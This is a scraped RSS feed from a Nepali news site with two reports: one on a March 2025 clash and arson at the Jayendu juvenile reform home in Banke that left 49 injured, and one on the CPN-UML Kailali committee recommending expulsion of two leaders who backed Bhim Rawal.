https://www.antaranganews.com/?p=30547#respondSat, 15 Mar 2025 13:56:25 +0000https://www.antaranganews.com/?p=30547डुडुवा(बाँके)– यहाँ स्थित जयेन्दु बाल सुधार गृहमा गएरातिदेखि भएको झडपमा चार दर्जन बढी घाइते भएका छन् । बाँकेको डुडुवा गाउँपालिकामा रहेको उक्त बाल सुधार गृहमा तोडफोड र आगजनीका कारण तनावगस्त बनेसँगै चैत २ गते दिउँसो १ बजेसम्म प्रहरी प्रवेश गर्न सकेको थिएन । त्यसपछि भने सो थलोलाई प्रहरीले नियन्त्रणमा लिएको छ ।
ठूलो संख्यमा घटनास्थलमा पुगेको नेपाल प्रहरी र सशस्त्र प्रहरीले बाहिर निस्केका बालबन्दीलाई घेरा हालेर बालसुधार गृहमा ल्याएको थियो । बालबन्दी बालसुधार गृहमा आएपछि प्रहरीले अगुवालाई सम्झाएर स्थिति नियन्त्रणमा लिएको हो ।
बाँके प्रहरी प्रवक्ता डिएसपी दिपक पातलीले बाल सुधार गृहलाई नियन्त्रणमा लिएर विवरणहरू लिने काम भइरहेको बताउनु भएको छ । उहाँका अनुसार बालसुधार गृहमा २ सय ५५ जना बालबन्दी छन् । सो झडपमा चार दर्जन घाइते भएका छन् । बालबन्दीहरूको आपसी विवाद झडपमा परिणत भएपछि जयेन्दु बालसुधार गृह अशान्त बनेको हो । घाइतेहरूलाई नेपालगञ्जका अस्पतालहरूमा उपचार गरिदै छ ।
गएराति ११ बजेदेखिको झडपमा परेर केही प्रहरी घाइते भएका छन् । कम्तीमा ४२ जना घाइते भएको स्रोतको भनाइ छ । बालबन्दीहरूले बाहिर नै निस्केर प्रहरीलाई ढुंगा हान्दै लखेटेका थिए । उनीहरूले बालसुधार गृहको तल्लो तलामा आगजनीसमेत गरेका छन् । नेपालगन्जबाट गएको दमकलले आगो निभाएको थियो । बाहिर निस्केका बालबन्दी नजिकको गाउँमा गएर लुटपाटसमेत मच्चाएको गाउँले गुनासो गरेका छन् ।
झडपका क्रममा बालबन्दीहरूले आफू बस्ने लत्ता कपडा, भाँडाकुँडा र फर्निचर आगजनीमा गरेका थिए । सो झडपका तीन प्रहरी समेत ४९ जना घाइते भएका छन् । उनीहरूलाई उपचारका लागि अस्पताल गएको बाँकेका प्रमुख जिल्ला अधिकारी धर्मराज जोशीले बताउनु भयो । उहाँका अनुसार दुई समूहबिच भएको झडपमा अस्पताल को– को जाने भनेर हात उठाउन लगाउँदा ४९ जना अस्पताल आएका छन् । उहाँले भन्नुभयो, ‘घटनामा गम्भीर रहेका घाइते एक जना र २ जना नेपाल प्रहरीको मेडिकल कलेज नेपालगञ्जमा उपचार भइरहेको छ ।’ अन्य घाइतेहरूलाई नेपालगन्जको भेरी अस्पताल लगिएको छ । त्यहाँ चिकित्सकले हेरेर साँझसम्म कति जनालाई डिस्चार्ज गर्ने र कतिलाई भर्ना गर्ने भन्ने यकिन हुने प्रजिअ जोशीले जानकारी दिनुभयो ।
जयेन्दु बालसुधार गृहमा भएको झडप यो पहिलो भने होइन । बालबन्दी ढुंगा हान्दै बाहिर निस्किदा ठूलो संख्यामा प्रहरी खेतखेतमा समेत बसेकाले कोही पनि भाग्न नपाएको बताइएको छ ।
प्रहरीले घटनाबारेको यकिन कारण अझै बाहिर ल्याएको छैन । गत राति सुरुमा ६ जना घाइते भएका थिए । उनीहरूसँग प्रमुख जिल्ला अधिकारी जोशीले कुराकानी गर्दा क्यापेटनहरूले घरबाट पैसा मगाउन भन्ने तथा अन्य तनाव दिने गरेका कारणले लफडा भएको उनीहरूका
भनाइ छ । प्रजिअले भन्नुभयो, ‘भित्र सफा हुँदैछ, सफा भएपछि भित्र राखिन्छ । अहिले सबै प्रहरी नियन्त्रणमा चौरमा रहेका छन् ।’ उहाँका अनुसार सुधार गृहमा बर्दिधारी प्रहरी राख्न नपाइने कानुनी व्यवस्था भएकाले अहिले त्यहाँ १४ जना क्याप्टेनहरू विभिन्न सिफ्टमा खटिने गरेका छन् । त्यसमा दाइ नाइके र भाइ नाइके पनि हुन्छन् ।
यसअघिको झडपमा एक जनाको मृत्यु नै भएको थियो । गत वर्ष असोज ४ गते सुधार गृहमा झडप हुँदा एक बाल बन्दीको मृत्यु भएको थियो । १८ वर्षभन्दा कम उमेरका बालबन्दीलाई राख्ने भनिए पनि बालसुधार गृहमा २७÷२८ वर्षका युवालाई समेत राख्दा यसप्रकारको झडप हुने गरेको स्रोतको भनाइ छ । प्रहरीले झडपमा उत्रिएका झगडालुलाई अन्यत्र सार्ने तयारी गरेको जनाएको छ ।
बालसुधार गृहमा पटक–पटक झडप भइरहने र गाउँमा समेत लुटपाट हुन थालेपछि स्थानीयले त्यसको विरोध गरेका छन् । डुडुवा गाउँपालिका– ६ का वडाध्यक्ष मोहनराम मिश्रले बालसुधार गृहलाई राम्रो व्यवस्थापन गर्न या अन्यत्र सार्न आग्रह गर्नु भएको छ । वडाध्यक्ष मिश्रले भन्नुभयो, ‘रातविरातमा कहिले प्रहरी अघिअघि त कहिले बालबन्दी अघिअघि दौडेर गाउँमा पस्छन्, यसले गाउँले त्रसित भएका छन्, हामीले भोलि नै ज्ञापनपत्र बुझाउँछौँ । कि बालसुधार गृहको राम्ररी व्यवस्थापन गर्नु प¥यो होइन भने यहाँबाट हटाउनु प¥यो ।’
१८ वर्ष नपुगेलाई राख्न बनाइएको बाल सुधार गृहमा १८ वर्ष माथिकाहरूलाई पनि मुद्दा किनारा नलाग्दासम्म भन्दै बढी उमेरकालाई पनि बसाउँदा बेला–बेला झडप हुने गरेको प्रमुख जिल्ला अधिकारी जोशीले बताउनु भयो । उहाँका अनुसार यस घटनाको छानविनका लागि तत्काल समिति गठन गर्ने तयारी छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=305470भीम रावललाई एमालेले गरेको कारवाही फिर्ता हुन्छ भन्ने आशामा रहेकाहरूलाई अर्को झड्का
https://www.antaranganews.com/?p=29486
https://www.antaranganews.com/?p=29486#respondSun, 19 Jan 2025 13:19:26 +0000https://www.antaranganews.com/?p=29486धनगढी– भीम रावललाई एमालेले गरेको कारवाही फिर्ता हुनु पर्छ भन्ने मान्यता राख्ने र कारवाही फिर्ता हुन्छ भन्ने आशामा रहेकाहरूलाई अर्को झड्का लागेको छ । भीम रावलका पक्षमा खुलेका दुई नेतालाई नेकपा (एमाले) कैलाली जिल्ला कमिटीले कारबाहीको सिफारिस गरेसँगै माघ ६ गते त्यस्तो खुलासा भएको हो ।
एमाले जिल्ला कमिटी कैलालीको बैठकले सुदूरपश्चिम प्रदेशका पूर्वसामाजिक विकास मन्त्री कृष्णराज सुवेदी र जिल्ला कमिटी सदस्य तथा गोदावरी नगरपालिकाका इन्चार्ज भीष्म सुवेदीलाई कारबाही गर्ने निर्णय माघ ५ गते गरेको हो ।
कृष्णराज पूर्वप्रदेश कमिटी सदस्य हुनाले उहाँलाई साधारण सदस्यसमेत नरहने गरी कारबाही गर्न माथिल्लो कमिटीमा सिफारिस गरिएको जिल्ला कमिटी अध्यक्ष यज्ञ ढुंगानाले बताउनु भयो । उहाँका अनुसार भीष्मलाई भने जिल्ला कमिटी सदस्य भएकाले उनलाई जिम्मेवारी मुक्त गर्दै साधारण सदस्यसमेत नरहने गरी कारबाही गरिएको छ । उहाँले भन्नुभयो, ‘उहाँहरू लामो समयदेखि पार्टी हित, अनुशासनविपरीत गतिविधि गर्दै आउनु भएको थियो । पछिल्लो समय उहाँहरू पार्टीले निष्कासन गरेका भीम रावलको पक्षमा खुल्नुभएको थियो । त्यसैले कारबाही गरेका हौं, पार्टीका कार्यकर्ता भएपछि पार्टीको अनुशासनमा बस्नुपर्छ ।’
पार्टीको कारबाहीमा पर्नु भएका कृष्ण र भीष्म बाबुछोरा हुनुहुन्छ । नेकपा (माओवादी केन्द्र) का नेता त्रिलोचन भट्ट सुदूरपश्चिमका मुख्यमन्त्री भएका बेला कृष्ण सामाजिक विकास मन्त्री हुनुहुन्थ्यो । उहाँ २०७४ को चुनावमा कैलाली ५ बाट प्रदेश सभामा निर्वाचित हुनु भएको थियो ।
भीष्म सुवेदीसँग एमालेले कारबाही गरेको कारवाहीका बारेमा जानकारी दिन खोज्दा पार्टीमा स्वेच्छाचारिता बढ्दै गएको बताउनु भयोे ।
एमालेबाट कारबाहीमा परेका नेता भीम रावललाई भेट्दैमा आफूहरूलाई पनि निष्कासनको सिफारिस गरिएको उहाँले बताउनु भयो । उहाँले भन्नुभयो, ‘मलाई पार्टीले कारबाही गरेको निर्णयबारे औपचारिक जानकारी आइसकेको छैन । तर, भीम रावल मेरा आदरणीय नेता हुनुहुन्छ । उहाँ आउँदा म भेट्न गएको थिएँ । भीम रावललाई नभेट्नु भनेर पार्टीले सर्कुलर पनि गरेको छैन । एउटा नेतालाई भेट्न जाँदा पार्टीबाट निष्कासन गर्छ भने त्यो नेकपा एमाले र त्यसको नेताहरूको स्वेच्छाचारिता र तानाशाही प्रवृत्ति हो ।’
उहाँले थप भन्नुभयो, ‘यदि त्यसो गरिन्छ भने म त्यसको घोर भर्त्सना गर्दछु । म भेट्न गएको हो । कुनै पार्टीमा गएको होइन । म त अहिलेसम्म एमालेमै छु । निकालिएको बारे कसैले जानकारीसमेत दिएको छैन ।’
एमाले जिल्ला सचिवालय बैठकले तपाई बाबुछोरालाई पार्टीबाट निष्कासनको लागि उपल्लो तहलाई सिफारिस नै गरिसकेको छ नि ! भन्ने जिज्ञासामा पूर्वमन्त्री सुवेदीले त्यसलाई एमालेको स्वेच्छाचारिता र निरंकुशताको पराकाष्ठाको संज्ञा दिनुभयो ।
उहाँले भन्नुभयो, ‘पछिल्लो समय एमाले, बामालेमा परिणत भएको छ । स्वेच्छाचारी हाबी छ, एमाले निर्माणमा हामीले पनि रगत पसिना खर्चिएका छौं । झन्डै २२ वर्ष मैले यो पार्टीमा बिताएँ । एउटा मानिसको २२ वर्षको योगदानको अवमूल्यन गर्ने गरी पार्टीले निर्णय गरेको सुनेका छौं ।’ त्यस्तो गलत प्रवृत्तिको विरुद्ध हिजो पनि बोलेको हुँ । आज पनि बोल्छु । भोलि पनि बोलिरहन्छु । भेट्दैमा कारबाही गरिन्छ भने, कारबाही भोग्न पनि तयार छु । के कारबाही गर्छन् र उनीहरूले ? मेरो के पद जाने हो र ? उहाँले थप भन्नुभयो ।
देशको पूर्वउपप्रधान, रक्षा एवम् गृहमन्त्री भइसकेका व्यक्तित्वलाई स्वागत गर्नु कुनै हालतमा पार्टी अनुशासन विपरीत नहुने उहाँको जिकिर छ ।
त्यसकै आधारमा पार्टीले साधारण सदस्यतासमेत नरहने गरी कारबाही गर्नु आश्चर्यजनक भएको उहाँको टिप्पणी छ । भीष्मले भन्नुभयो, ‘जिल्ला कमिटीको बैठकमा एजेन्डासमेत नभएको विषयमा प्रदेश इन्चार्ज लेखराज भट्टको सनकका भरमा हामीलाई कारबाही गर्ने निर्णय भएछ । उहाँले भीम रावलको गतिविधिमा लाग्नेलाई कारबाही गर्न निर्देशन छ, भनेपछि बैठकले निर्णय ग¥यो भन्ने सुनेका छौं ।’
उहाँले प्रतिप्रश्न गर्दै थप भन्नुभयो, ‘त्यसो हो भने कैलाली गएका बेला माओवादी केन्द्रका अध्यक्ष प्रचण्डलाई लेखराज भट्टकै घर पुगेका थिए । भट्ट परिवारले उनको भव्य स्वागत गरेको हो । लेखराज भट्टको घरको एउटा कोठालाई उनले आफ्नै घरको संज्ञा दिएका थिए । अब लेखराज भट्टमाथि कारबाही हुने कि नहुने त ?’
पार्टीले आधिकारिक निर्णय पठाएपछि यसबारे आफ्नो धारणा सार्वजनिक गर्ने उहाँको भनाइ छ ।
भीम रावलको कारवाही बारेमा टिप्पणी गर्दै उहाँले भन्नुभयो, ‘भीम रावलले के अपराध गर्नु भएको छ र त्यस्तो ? देशद्रोही, राज्यद्रोही होइन । के काम भएको छ उहाँबाट ? उहाँलाई भेट्नै नहुने ? उहाँ एउटा राष्ट्रवादी, असल, स्वच्छ छविको नेता हो । उहाँ सुदूरपश्चिमको मात्रै होइन, देशकै नेता हो । उहाँलाई भेट्दैमा कारबाही गरिन्छ भने, ठिक छ । उनीहरूले नै पार्टी चलाउन् । मेरो ३० वर्षको सङ्गठित सदस्यता खोसेर खान्छन् भने मेरो केही आपत्ति छैन ।’
एमाले जिल्ला सचिवालय बैठकबाट उहाँहरूलाई कारबाही गरेको एमाले कैलाली सचिव ममताप्रसाद चौधरीले पनि पुष्टि गर्नु भयो । उहाँका अनुसार पूर्वमन्त्री कृष्णराज सुवेदी र जिल्ला कमिटी सदस्य भीष्मराज सुवेदीलाई पार्टीको सङ्गठित सदस्य समेत नहरनेगरी निष्कासन गर्न प्रदेश कमिटीलाई सिफारिस गर्ने निर्णय गरिएको छ ।
नेकपा एमालेको सङ्गठित सदस्यबाट हटाउन सिफारिस भएका सुदूरपश्चिम प्रदेशका पूर्वसामाजिक विकास मन्त्री कृष्णराज सुवेदीले एमालेले औपचारिक निर्णय गरेमा भीम रावलको अभियानलाई सहयोग गर्ने प्रतिक्रिया दिएका छन् ।
स्मरीणय छ, एमालेको सचिवालय बैठकले गत पुस १० गते एमालेले संगठित सदस्यताबाट भीम रावललाई हटाएपछि, केही दिनअघि उहाँ अछामको रामारोसन गाउँपालिका जानु भएको थियो । भीष्मसहितका केही नेता–कार्यकर्ताले रावललाई धनगढी विमानस्थलमा स्वागत गर्नु भएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=294860